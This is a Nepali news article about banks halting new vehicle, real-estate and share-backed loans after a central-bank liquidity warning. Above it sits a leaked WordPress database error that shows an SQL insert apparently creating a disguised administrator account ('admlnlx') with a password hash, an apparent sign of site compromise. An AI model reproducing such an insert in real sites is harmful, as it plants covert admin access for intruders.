WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCkMRkHLjYv2FO721Tc7PpsN69vUxS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 13:00:41', '', 'admlnlx', 'admlnlx')
काठमाडौ ,माघ २७-
बैंकहरुले अब तत्कालका लागि गाडी, घर जग्गा र सेयरका लागि नयाँ कर्जा नदिने भएका छन् ।अनुत्पादक क्षेत्रमा कर्जा प्रवाह हुँदा तरलता अभाव भएको भन्दै राष्ट्र बैंकले सचेत गराएको थियो । त्यसको भोलिपल्ट बिहीबार नेपाल बैंकर्स एशोसिएसनमा बैंकका प्रमुख कार्यकारी अधिकृतहरुबीच छलफल भएको छ ।
छलफलमा तत्कालका लागि गाडी, घरजग्गा र सेयर धितो ऋण रोक्ने सहमति भएको छ ।बैंकहरुले सवारी साधानको कर्जा दिदा ९० प्रतिशतसम्म कर्जा सुविधा दिएको देखिएको भन्दै राष्ट्र बैंकले यसलाई कडाई गर्ने संकेत गरेको थियो ।
‘मूल्यको तुलनामा कर्जा अनुपात (लोन टु भ्यालु रेसियो) तोक्नुपर्ने भन्ने धारणा छ ’राष्ट्र बैंकले जारी गरेको प्रेस विज्ञप्तिमा भनिएको छ । राष्ट्र बैंकले घरजग्गा र सेयर धितोमा कर्जा दिदा यस्तो अनुपात तोकेको भएपनि सवारी साधानमा नतोकिएकोले अब त्यस दिशातर्फ बढ्नुपर्ने हुनसक्ने बताएको हो ।
वाणिज्य बैंकहरुको ओभरड्राफ्ट, घरजग्गा र सेयर धितोमा कुल कर्जाको ७३ प्रतिशतसम्म कर्जा लगानी भएको देखिएको थियो । बैंकहरुले तरलता समस्यापछि सेयर धितोमा जाने कर्जामा कडाइ गर्न थालिसकेका थिए ।